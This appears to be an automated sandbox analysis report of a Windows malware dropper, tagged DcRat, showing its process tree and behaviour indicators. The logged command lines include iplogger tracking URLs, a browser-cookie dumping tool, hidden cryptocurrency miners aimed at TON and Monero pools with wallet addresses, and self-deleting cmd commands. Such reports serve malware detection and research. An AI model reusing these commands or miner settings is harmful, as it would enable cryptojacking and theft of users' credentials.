Infos.exePWhSdaGNWZZnS8BjtCCZ9pOe.exeIDgzLzkXcK21aBlMOtzETzcZ.exeapIafuakphKdmwhIYaWc_mP4.exezIlVU7ZogqbWpTqmVJGYv0Hh.exeLJJlylsdlerbUUgUBlj_im4E.exejmgtfwUdHp9OjWiA1hv55jGD.exeUxHD8WD6JzNKv1lcW6m7Keaj.exeV0CoOL90dCA2Fs9BKr5ffDlp.exeVFoNhG_Zeh0WXQxnBSFaZqAE.exeNmgYea8Ed5HpZgfZ6I_SyvV4.exedrecFYoUAZwZKDsRAB33WXoF.exeo7QhAXhuoJQjnxTdsdJdasfg.exe8yPhCVbCi1c8XIP1eciLPkHT.exe3pobJdeTncHRVAMa5wc46se6.exeBDJG9.exeInstall.exe7EEH0.exe7I4LD.exe9KGM4.exeInstall.exe76G9I.exe76G9IJMD201BBH1.exegtGhkMGggyQ8QkD_Z3jVqai0.exepid process 1076 Infos.exe 4700 PWhSdaGNWZZnS8BjtCCZ9pOe.exe 3112 IDgzLzkXcK21aBlMOtzETzcZ.exe 1300 apIafuakphKdmwhIYaWc_mP4.exe 4940 zIlVU7ZogqbWpTqmVJGYv0Hh.exe 1300 apIafuakphKdmwhIYaWc_mP4.exe 2948 LJJlylsdlerbUUgUBlj_im4E.exe 5248 jmgtfwUdHp9OjWiA1hv55jGD.exe 5264 UxHD8WD6JzNKv1lcW6m7Keaj.exe 5320 V0CoOL90dCA2Fs9BKr5ffDlp.exe 5240 VFoNhG_Zeh0WXQxnBSFaZqAE.exe 5224 NmgYea8Ed5HpZgfZ6I_SyvV4.exe 5756 drecFYoUAZwZKDsRAB33WXoF.exe 5256 o7QhAXhuoJQjnxTdsdJdasfg.exe 5272 8yPhCVbCi1c8XIP1eciLPkHT.exe 5936 3pobJdeTncHRVAMa5wc46se6.exe 4076 BDJG9.exe 5556 Install.exe 208 7EEH0.exe 4888 7I4LD.exe 5508 9KGM4.exe 5800 Install.exe 4476 76G9I.exe 5816 76G9IJMD201BBH1.exe 5816 76G9IJMD201BBH1.exe 5752 gtGhkMGggyQ8QkD_Z3jVqai0.exe 5752 gtGhkMGggyQ8QkD_Z3jVqai0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exeFiles.exemsedge.exeFolder.exepzyh.exemsedge.exedescription pid process target process PID 2000 wrote to memory of 2752 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Files.exe PID 2000 wrote to memory of 2752 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Files.exe PID 2000 wrote to memory of 2752 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Files.exe PID 2000 wrote to memory of 4972 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Install.exe PID 2000 wrote to memory of 4972 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Install.exe PID 2000 wrote to memory of 4972 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Install.exe PID 2000 wrote to memory of 4996 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe KRSetp.exe PID 2000 wrote to memory of 4996 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe KRSetp.exe PID 2000 wrote to memory of 3944 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe jg3_3uag.exe PID 2000 wrote to memory of 3944 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe jg3_3uag.exe PID 2000 wrote to memory of 3944 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe jg3_3uag.exe PID 2752 wrote to memory of 436 2752 Files.exe File.exe PID 2752 wrote to memory of 436 2752 Files.exe File.exe PID 2752 wrote to memory of 436 2752 Files.exe File.exe PID 2000 wrote to memory of 4504 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe msedge.exe PID 2000 wrote to memory of 4504 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe msedge.exe PID 2000 wrote to memory of 4892 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Folder.exe PID 2000 wrote to memory of 4892 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Folder.exe PID 2000 wrote to memory of 4892 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Folder.exe PID 4504 wrote to memory of 4956 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4956 4504 msedge.exe msedge.exe PID 2000 wrote to memory of 2612 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Installation.exe PID 2000 wrote to memory of 2612 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Installation.exe PID 2000 wrote to memory of 2612 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Installation.exe PID 2000 wrote to memory of 4216 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe pzyh.exe PID 2000 wrote to memory of 4216 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe pzyh.exe PID 2000 wrote to memory of 4216 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe pzyh.exe PID 2000 wrote to memory of 2912 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe pub2.exe PID 2000 wrote to memory of 2912 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe pub2.exe PID 2000 wrote to memory of 2912 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe pub2.exe PID 2000 wrote to memory of 1076 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Infos.exe PID 2000 wrote to memory of 1076 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Infos.exe PID 2000 wrote to memory of 1076 2000 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe Infos.exe PID 4892 wrote to memory of 4716 4892 Folder.exe Folder.exe PID 4892 wrote to memory of 4716 4892 Folder.exe Folder.exe PID 4892 wrote to memory of 4716 4892 Folder.exe Folder.exe PID 4216 wrote to memory of 2924 4216 pzyh.exe jfiag3g_gg.exe PID 4216 wrote to memory of 2924 4216 pzyh.exe jfiag3g_gg.exe PID 4216 wrote to memory of 2924 4216 pzyh.exe jfiag3g_gg.exe PID 2752 wrote to memory of 212 2752 Files.exe msedge.exe PID 2752 wrote to memory of 212 2752 Files.exe msedge.exe PID 212 wrote to memory of 4668 212 msedge.exe msedge.exe PID 212 wrote to memory of 4668 212 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe PID 4504 wrote to memory of 4992 4504 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe"C:\Users\Admin\AppData\Local\Temp\7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe639246f8,0x7ffe63924708,0x7ffe639247184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,8395511421460651168,13690578033526522605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,8395511421460651168,13690578033526522605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 7443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 8043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 8283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 12443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 6643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 10403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffe639246f8,0x7ffe63924708,0x7ffe639247183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5740 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2124 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1c4,0x22c,0x7ff644795460,0x7ff644795470,0x7ff6447954804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,11126436492746017852,16429097436777989514,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1868 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Infos.exe"C:\Users\Admin\AppData\Local\Temp\Infos.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exe"C:\Users\Admin\Documents\PWhSdaGNWZZnS8BjtCCZ9pOe.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exe"C:\Users\Admin\Documents\IDgzLzkXcK21aBlMOtzETzcZ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 4604⤵
- Program crash
-
C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exe"C:\Users\Admin\Documents\zIlVU7ZogqbWpTqmVJGYv0Hh.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 4724⤵
- Program crash
-
C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exe"C:\Users\Admin\Documents\apIafuakphKdmwhIYaWc_mP4.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\odt\gtGhkMGggyQ8QkD_Z3jVqai0.exe"C:\odt\gtGhkMGggyQ8QkD_Z3jVqai0.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\LJJlylsdlerbUUgUBlj_im4E.exe"C:\Users\Admin\Documents\LJJlylsdlerbUUgUBlj_im4E.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftLibs\Ei8DrAmaYu9K8ghN89Cs.exe"4⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF5⤵
-
C:\Windows\notepad.exeC:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5196 -s 4406⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"5⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1372 -s 2686⤵
- Program crash
-
C:\Users\Admin\Documents\VFoNhG_Zeh0WXQxnBSFaZqAE.exe"C:\Users\Admin\Documents\VFoNhG_Zeh0WXQxnBSFaZqAE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4684⤵
- Program crash
-
C:\Users\Admin\Documents\e8ds_0qOcrUahz4Yjq0aLvxh.exe"C:\Users\Admin\Documents\e8ds_0qOcrUahz4Yjq0aLvxh.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1eb3a752-4420-4367-bdec-0407d20e9dc0.exe"C:\Users\Admin\AppData\Local\Temp\1eb3a752-4420-4367-bdec-0407d20e9dc0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe"C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\j9JoI22bTxWmSEp1Dm9hS1RV.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe"C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 6484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 7884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 12724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 12804⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "6WoEM1C6fgCRhgUAcZHi2POU.exe" /f & erase "C:\Users\Admin\Documents\6WoEM1C6fgCRhgUAcZHi2POU.exe" & exit4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "6WoEM1C6fgCRhgUAcZHi2POU.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 13884⤵
- Program crash
-
C:\Users\Admin\Documents\gtGhkMGggyQ8QkD_Z3jVqai0.exe"C:\Users\Admin\Documents\gtGhkMGggyQ8QkD_Z3jVqai0.exe"3⤵
- Executes dropped EXE
-
